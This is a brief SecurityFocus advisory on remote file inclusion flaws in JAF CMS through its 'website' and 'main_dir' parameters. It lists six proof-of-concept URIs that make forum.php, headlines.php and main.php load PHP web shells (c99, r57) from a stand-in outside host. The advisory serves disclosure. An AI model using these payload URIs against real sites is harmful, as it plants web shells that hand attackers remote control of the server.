JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities

Attackers may launch attacks through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/forum.php?website=http://www.example2.com/c99.txt?
http://www.example.com/forum.php?main_dir=http://www.example2.com/c99.txt?
http://www.example.com/headlines.php?website=http://www.example2.com/erne.txt?
http://www.example.com/headlines.php?main_dir=http://www.example2.com/r57.txt?
http://www.example.com/main.php?website=http://www.example2.com/c99.txt?
http://www.example.com/main.php?main_dir=http://www.example2.com/erne.txt?


 

Privacy Statement
Copyright 2010, SecurityFocus